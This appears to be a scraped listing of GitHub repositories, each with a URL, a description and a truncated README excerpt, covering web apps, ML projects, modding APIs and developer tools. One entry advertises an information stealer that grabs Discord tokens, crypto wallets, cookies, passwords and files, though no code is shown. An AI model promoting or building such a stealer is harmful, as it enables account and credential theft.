# wasteof.plus <!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --> [![All Contributors](https://img.shields.io/badge/all_contributors-3-orange.svg?style=flat-square)](#contributors-) <!-- ALL-CONTRIBUTORS-BADGE:END --> [![](https://img.shields.io/github/stars/imadeanaccount1/wasteof.plus?color=...
geeeeeeeek/java_video
https://github.com/geeeeeeeek/java_video
基于Java的视频点播网站,基于java+springboot+vue开发的短视频播放系统
# Java视频点播网站 > 学习过程中,遇到问题可以咨询作者。 ### 演示地址 前台地址: http://video.gitapp.cn 后台地址: http://video.gitapp.cn/admin 后台管理帐号: 用户名:admin123 密码:admin123 ### 功能介绍 平台采用B/S结构,后端采用主流的Springboot框架进行开发,前端采用主流的Vue.js进行开发。 整个平台包括前台和后台两个部分。 - 前台功能包括:首页、视频列表、视频详情页、交互中心、个人中心模块。 - 后台功能包括:总览、视频管理、分类管理、标签管理、评论管理、用户管理、运营管理、日志管理、系统信息模块。 ...
castaneai/apubhook
https://github.com/castaneai/apubhook
Incoming Webhook-like server for ActivityPub.
# APubHook Incoming WebHook-like server for ActivityPub. You can post messages to Fediverse like Incoming WebHook in Slack with the command `curl -X POST -d '{"text": "hello"}' ...` ## Configuration APubHook works on [Cloudflare Workers](https://workers.cloudflare.com/); use [Wrangler](https://developers.cloudflar...
Hugo-Dz/svelte-rust
https://github.com/Hugo-Dz/svelte-rust
A simple example to run Rust 🦀 code in your Svelte application.
# Demo Svelte + Rust 👉 You can play around the live demo [here](https://svelte-rust.vercel.app/) ![demo](readme_assets/demo.gif) # Create a Svelte app Everything you need to build a Svelte project, powered by [`create-svelte`](https://github.com/sveltejs/kit/tree/master/packages/create-svelte). ## Creating a proj...
HaxyMoly/Pangu-Weather-ReadyToGo
https://github.com/HaxyMoly/Pangu-Weather-ReadyToGo
盘古天气大模型全流程演示( 输入数据准备、预测及结果可视化)Unofficial demonstration of Huawei's Pangu Weather Model. Implementing the entire process of data preparation for input, forecasting conversion of forecasted results, and visualization.
# Pangu-Weather-ReadyToGo Unofficial demonstration of [Huawei's Pangu Weather Model](https://github.com/198808xc/Pangu-Weather). Implementing the entire process of data preparation for input, forecasting conversion of forecasted results, and visualization. 【非官方】华为盘古天气模型演示,含输入数据准备、预测结果转换及结果可视化全流程。[中文指南](#安装和准备工作) ![T2M...
jasonmccreary/what-the-fake
https://github.com/jasonmccreary/what-the-fake
Example app for my Laracon 2023 talk.
# What the fake? This repo contains a Laravel 10 application used to demostrate testing with fakes during my Laracon US 2023 talk. You may review the [individual commits](https://github.com/jasonmccreary/what-the-fake/commits/main) to isolate some of the changes, or, of course, clone this repo to run the tests locally...
XD2Sketch/next-google-tag-manager
https://github.com/XD2Sketch/next-google-tag-manager
Easily implement Google Tag Manager in your Next 13+ project
# @magicul/next-google-tag-manager ![npm bundle size](https://img.shields.io/bundlephobia/min/@magicul/next-google-tag-manager) ![npm](https://img.shields.io/npm/dt/next-google-tag-manager) ![GitHub issues](https://img.shields.io/github/issues/XD2Sketch/next-google-tag-manager) ![npm](https://img.shields.io/npm/v/@mag...
foundry-rs/starknet-foundry
https://github.com/foundry-rs/starknet-foundry
Blazing fast toolkit for developing Starknet contracts.
<img src="./docs/src/images/logo.png" alt="logo" width="120" align="right" /> ## Starknet Foundry [![Telegram Chat][tg-badge]][tg-url] [![Telegram Support][tg-support-badge]][tg-support-url] [tg-badge]: https://img.shields.io/endpoint?color=neon&logo=telegram&label=chat&style=flat-square&url=https%3A%2F%2Ftg.sumanja...
milandas63/GIFT-Group2
https://github.com/milandas63/GIFT-Group2
null
# GIFT-Group2 NO NAME EMAIL-ID MOBILE 1 Abinash Das abinas2022@gift.edu.in 9238959872 2 Ajaya Mandal ajayam2022@gift.edu.in 7815096934 3 Asish Kumar Sahoo asish2022@gift.edu.in 6371211827 4 B...
taprosoft/llm_finetuning
https://github.com/taprosoft/llm_finetuning
Convenient wrapper for fine-tuning and inference of Large Language Models (LLMs) with several quantization techniques (GTPQ, bitsandbytes)
![test workflow](https://github.com/taprosoft/llm_finetuning/actions/workflows/tests.yml/badge.svg) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit\&logoColor=whit...
DFIR-Community/ArtifactParsers
https://github.com/DFIR-Community/ArtifactParsers
A repo that aims to centralize a current, running list of relevant parsers/tools for known DFIR artifacts
# ArtifactParsers A repo that aims to centralize a current, running list of relevant parsers/tools for known DFIR artifacts. ## What makes this different from any other list of DFIR tools? Ideally, the community will maintain this as tools come and go from relevance. If a tool is listed below, the community is vou...
NavidShokoufeh/v2ray
https://github.com/NavidShokoufeh/v2ray
v2ray client package for flutter
# v2ray client package for flutter package will includes codes both Android and Ios # Features : easy setup, fast connect, optimized codes for android(java) and ios(swift). # please share your interests on this package for publish sooner # Note : this package is under development and it will publish as soon as p...
weaviate/healthsearch-demo
https://github.com/weaviate/healthsearch-demo
Discover Healthsearch: Unlocking Health with Semantic Search ✨
# Healthsearch Welcome to the Healthsearch Demo, an open-source project aimed at showcasing the potential of leveraging user-written reviews and queries to retrieve supplement products based on specific health effects. [![Weaviate](https://img.shields.io/static/v1?label=%E2%9D%A4%20made%20with&message=Weaviate&color...
flare-ai/Stable-Diffusion-Discord-Bot
https://github.com/flare-ai/Stable-Diffusion-Discord-Bot
A discord bot with many features which uses A1111 as backend and uses my prompt templates for beautiful generations - even with short prompts.
# Stable Diffusion Discord Bot A python discord bot with many features which uses A1111 as backend and uses my prompt templates for beautiful generations - even with short prompts. ## Features It has many features: - It generates 2 images - Abitlity to upscale the images - Abitlity to create small variations of the im...
invictus717/MetaTransformer
https://github.com/invictus717/MetaTransformer
Meta-Transformer for Unified Multimodal Learning
<p align="center" width="100%"> <img src="assets\Meta-Transformer_banner.png" width="80%" height="80%"> </p> <div> <div align="center"> <a href='https://scholar.google.com/citations?user=KuYlJCIAAAAJ&hl=en' target='_blank'>Yiyuan Zhang<sup>1,2*</sup></a>&emsp; <a href='https://kxgong.github.io/' target='_blan...
camenduru/sdxl-colab
https://github.com/camenduru/sdxl-colab
null
🐣 Please follow me for new updates https://twitter.com/camenduru <br /> 🔥 Please join our discord server https://discord.gg/k5BwmmvJJU <br /> 🥳 Please join my patreon community https://patreon.com/camenduru <br /> ## 🦒 Colab # 🚦 WIP 🚦 | Colab | Info | --- | --- | [![Open In Colab](https://colab.research.google...
cvetomirkaloyanov/Mevbot-info
https://github.com/cvetomirkaloyanov/Mevbot-info
Information MevBot
# Mevbot Constructing a flashbots bundle for arbitrage Next, I needed to construct my flashbots bundle to send to the relay. Since the detected mempool transaction could be a type 0 or type 2 transaction, I must have scenarios for both. For more on using mempool transactions in your bundles, you can refer to our prior...
amazon-science/ContraCLM
https://github.com/amazon-science/ContraCLM
[ACL 2023] Code for ContraCLM: Contrastive Learning For Causal Language Model
# ContraCLM: Contrastive Learning for Causal Language Model This repository contains code for the ACL 2023 paper, [ContraCLM: Contrastive Learning for Causal Language Model](https://arxiv.org/abs/2210.01185). Work done by: Nihal Jain*, Dejiao Zhang*, Wasi Uddin Ahmad*, Zijian Wang, Feng Nan, Xiaopeng Li, Ming Tan, R...
capjamesg/visionscript
https://github.com/capjamesg/visionscript
A high-level programming language for using computer vision.
![A VisionScript Notebook counting people in an image](https://raw.githubusercontent.com/capjamesg/visionscript/main/notebook.png) # VisionScript [VisionScript](https://visionscript.dev) is an abstract programming language for doing common computer vision tasks, fast. VisionScript is built in Python, offering a simp...
Ericsson/essvt
https://github.com/Ericsson/essvt
A repository for contributions related to the ESSVT test automation tool
# ESSVT Ericsson Support Systems Validation Tool (ESSVT) is an orchestration tool that secures continuous testing, to deliver on time with quality. It's a powerful testing solution designed to enable test automation for Ericsson users and its customers. Its primary purpose is to facilitate testing in CI/CD workflows, ...
regamnash858/RN
https://github.com/regamnash858/RN
null
Examples demonstrating how PHP TimeCop works php examples example blog-article example-project potherca timecop php-modules example-code php-module php-examples php-extensions example-repo example-app example-codes example-projects examples-php php-example php-timecop potherca-blog# RN
threepointone/partykit-tinybase
https://github.com/threepointone/partykit-tinybase
A demo of a todo app built with tinybase, made multiplayer with partykit
# PartyKit × TinyBase This shows how [y-partykit](https://github.com/partykit/partykit/tree/main/packages/y-partykit) can be used to add multiplayer to a TinyBase app. Based on [TinyBase' TodoApp with Checkpoints demo](https://tinybase.org/demos/todo-app/todo-app-v5-checkpoints/), we use [createYjsPersister](https://...
nix-community/nix-github-actions
https://github.com/nix-community/nix-github-actions
A library to turn Nix Flake attribute sets into Github Actions matrices [maintainer=@adisbladis]
# nix-github-actions This is a library to turn Nix Flake attribute sets into Github Actions matrices. **Features:** - Unopinionated Install Nix using any method you like - Flexible Nix-github-actions is not an action in itself but a series of templates and a Nix library to build your own CI. - Parallel job execut...
neoforged/NeoForge
https://github.com/neoforged/NeoForge
Neo Modding API for Minecraft, based on Forge
![NeoForged Logo](assets/NeoForged_logo.svg) NeoForge ============= [![Discord](https://img.shields.io/discord/313125603924639766.svg?color=%237289da&label=Discord&logo=discord&logoColor=%237289da)][Discord] Forge is a free, open-source modding API all of your favourite mods use! | Version | Support | |-----...
Mwos77/mwosstealer77
https://github.com/Mwos77/mwosstealer77
A discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc
<h1 align="center"> MStealer </h1> <p align="center"> <kbd> <img src="https://cdn.discordapp.com/attachments/1105744953793052745/1126624527179333783/mwos.png" width="400"></img> </kbd> </p> <p align="center"> <img src=""> <img src=""> <br> <img src=""> <img src=""> <br> <img src=""> ...
Venusdev2113/javascript-code
https://github.com/Venusdev2113/javascript-code
this is javascript code for animation.
# javascript-serveral-animation-effect I made the project including a lot of animation effect.